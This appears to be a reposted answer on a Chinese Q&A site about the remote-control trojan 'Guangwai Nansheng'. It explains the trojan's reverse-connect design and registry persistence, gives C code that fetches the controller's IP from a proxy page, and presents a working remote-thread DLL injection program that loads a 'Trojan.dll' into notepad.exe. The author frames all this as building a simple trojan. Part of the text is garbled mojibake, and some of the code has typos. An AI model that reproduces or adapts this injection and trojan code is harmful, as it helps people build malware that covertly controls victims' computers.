关于第四代木马“广外男生”

2025-03-09 11:12:36

推荐回答（1个）

回答1：

您好，这个可以吗广外男生是广外程序员网络(前广外女生网络小组)精心制作的一款远程控制软件，是一个专业级的远程控制以及网络监控工具。而广外男生除了具有一般普通木马应该具有的特点以外，还具备独有的特色： 1.客户端高度模仿WINDOWS资源管理器：除了全面支持访问远程服务端的文件系统，也同时支持通过对方的“网上邻居"访问对方内部网其他机器的共享资源！ 2.强大的文件操作功能：可以对远程机器进行建立文件夹，整个文件夹(连子目录，文件)一次删除，支持多选的上传，下载等基本功能。同时特别支持高速远程文件查找，而且可对查找结果进行下载和删除的操作！ 3.运用了"反弹端口原理"与"线程插入"技术：使用了目前流行的反弹端口的木马技术，由服务端主动连接客户端，因此在互联网上可以访问到局域网里通过 NAT 代理(透明代理)上网的电脑，轻松穿过防火墙(包括：包过滤型及代理型防火墙)。广外男生外观比较漂亮（哈，人家毕竟是专门做木马的，^_^），笔者最近初步研究了一下这个较新的木马！按照帮助文件配置了木马，在自己的PC上作实验了…… 广外男生隐藏了服务端，只有运行服务端时，服务端的进程会短时暴露在任务管理器下，不过是一闪而过！根据广外男生的配置，我们可以知道是它运用了DLL注入到远程进程里面！利用dll插入线程寄生到Windows系统进程(如explorer)中，本身没有单独进程。我们利用注册表监测工具查到复制自身到system32目录下，在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加自己，复制寄生到进程的一个DLL到system32目录下，随机写入注册表，位置不固定，重启之后随系统进程启动自身。所以手工查杀很麻烦！DLL之所以位置不固定是由于WINDOWS的原因，DLL是被注册到WINDOWS里，手工注册可以使用regsvr32命令注册，程序也可以实现，不过不在本文讨论范围内。至于端口反弹，很简单，就是服务端连接客户端。广外男生有两种连接方式，一种是面向固定IP的，另一种是面向动态IP的。面向固定IP没什么技术可言，服务端直接连接客户端。面向动态IP的通过中间的代理（因为它的IP是固定的），相当于我们使用的肉鸡，通过配置客户端，生成一个HTM的页面，当然数据是经过加密的。服务端每次启动尝试获取这个文件，把里面的内容解密得到用户最新的IP和连接的端口。主要的代码如下： char *request="GET /guestbook.htm"; //广外男生默认的生成页面 char buffer[2000]; destSockAddr.sin_family = AF_INET; destSockAddr.sin_port=htons(80); deskSocketAddr.Sin_Addr.S_Addr= inet_addr(DEST_IP_ADDR); //代理的IP destSocket=socket(AF_INET,SOCK_STREAM,0); connect(destSocket,(LPSOCKADDR)&destSockAddr,sizeof(destSockAddr)); send(destSocket,request,strlen(request)+1,0); recv(destSocket,buffer,2000,0);（续） buffer里就是整个guestbook的内容，当然包括HTTP头部，可以分析里面的内容得到客户机的详细情况！知道了它的原理，它的神秘面纱很快就被揭开了！我们完全能够用编程实现。为了弄清实现方法，我们必须首先了解Windows系统的另一种"可执行文件"----DLL，DLL是Dynamic Link Library（动态链接库）的缩写，DLL文件是Windows的基础，因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑，是由多个功能函数构成，它并不能独立运行，一般都是由进程加载并调用的。运行DLL方法有多种，但其中最隐蔽的方法是采用动态嵌入技术，动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说，在Windows中的每个进程都有自己的私有内存空间，别的进程是不允许对这个私有空间进行操作的，但是实际上，我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如：窗口Hook、挂接API、远程线程等，这里介绍一下远程线程技术，它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。程序的关键是利用Kernel32.dll中的LoadLibraryA(W)API获取动态链接库函数入口地址，然后运行该地址以后的代码！由于在主汤锎唇嗽冻滔叱蹋冻滔叱滩凰孀胖鹘痰乃劳龆劳觯挥械彼拗魉劳鍪毕叱滩呕嵬Ｖ乖诵校≡诓迦朐断叱讨氨匦胗蠸E_DEBUG_NAME权限才能插入远线程！OK，我们下面用代码来实现！ /********************************************* * inject.c =>inject.exe * Author: leonshoh Wong ********************************************/ #include #include #include HANDLE hRemoteThread,hRemoteProcess; DWORD dwRemoteProcessid; PWSTR pszLibFileRemote=NULL; DWORD ProcesstoPid(char *pid) //查找指定进程的PID(Process ID) { HANDLE hProcessSnap=NULL; char buffer[MAX_PATH]; PROCESSENTRY32 pe32={0}; int i; hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //打开进程快照 if(hProcessSnap==(HANDLE)-1) { printf("\nCreateToolhelp32Snapshot() Error: %d",GetLastError()); return 0; } pe32.dwSize=sizeof(PROCESSENTRY32); if(Process32First(hProcessSnap,&pe32)) //开始枚举进程 { do { strcpy(buffer,pe32.szExeFile); for(i=strlen(buffer);i>0;i--) //截取进程名 if(buffer=='\\') break; if(!strcmp(pid,&buffer)) //判断是否和提供的进程名相等，是，返回进程的ID return pe32.th32ProcessID; } while(Process32Next(hProcessSnap,&pe32)); //继续枚举进程 } else { printf("\nProcess32First() Error: %d",GetLastError()); return 0; } CloseHandle(hProcessSnap); //关闭系统进程快照的句柄 return 0; } BOOL SetPrivilege() //本函数用于提升权限，提升到SE_DEBUG_NAME { TOKEN_PRIVILEGES tkp; HANDLE hToken; if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)) //打开当前进程失败 return FALSE; LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid); //查看当前权限 tkp.PrivilegeCount = 1; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); //调整权限，如上设置 return TRUE; } int main() { int cb; PTHREAD_START_ROUTINE pfnstartaddr; DWORD Threadid=0; char pszlibfilename[MAX_PATH]; dwRemoteProcessid=ProcesstoPid("notepad.exe"); //得到记事本的PID，当然也可以得到EXPLORER.EXE的PID，不过除非结束它的进程，不然一直驻留在内存中！ GetCurrentDirectory(MAX_PATH,pszlibfilename); //得到当前的目录路径 if(pszlibfilename[strlen(pszlibfilename)-1]!='\\') //判断是否为根目录 strcat(pszlibfilename,"file://Trojan.dll/"); else strcat(pszlibfilename,"Trojan.dll"); //连接要插入的动态连接库的文件名（这里是Trojan.dll） if(!SetPrivilege()) { printf("Error in SetPrivilege(): %d\n",GetLastError()); return 1; } hRemoteProcess=OpenProcess(PROCESS_Create_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwRemoteProcessid); //打开notepad.exe的进程得到进程句柄，注意第一个参数（打开句柄设置的权限） if(!hRemoteProcess) { printf("Remote Process not Exist or Access Denied\n"); return -1; } cb=(1+strlen(pszlibfilename))*sizeof(char); //计算dll文件名长度 pszLibFileRemote=VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE); //申请存放文件名的空间 if(!pszLibFileRemote) { printf("VirtualAllocEx() Error: %d",GetLastError()); return -1; } if(!WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszlibfilename,cb,NULL)) //把dll文件名写入申请的空间 { printf("WriteProcessMemory() Error: %d",GetLastError()); return -1; } pfnstartaddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32.dll"),"LoadLibraryA"); //获取动态链接库函数地址 if(!pfnstartaddr) { printf("GetProcAddress() Error: %d\n",GetLastError()); return -1; } hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnstartaddr,pszLibFileRemote,0,&Threadid); //创建远程线程，以DLL的文件名为远线程的参数好，我们执行一下写的所有程式，先运行inject.exe再运行Client.exe。看，服务端连上来了，成功了！（图4）好了，一个简单的DLL注入和端口反弹的木马就实现了！当然，一个强大的木马有很强大的功能，实现这些功能需要懂得很多系统编程方面的细节，具体可以看shotgun的《揭开木马神秘面纱》，对我们很有启发！这里我就不在重复里面的内容了！

最新问答

大众车为什么烧机油多数是哪些原因造成？

帮忙写份军人检查书

从美国起飞经由多伦多转机回中国，需要过境签证吗？

潍坊到苏州火车火车票多少钱？青岛到微坊的火车票价及时刻表，

女人四十经常单身一人在外打工，对身体有什么影响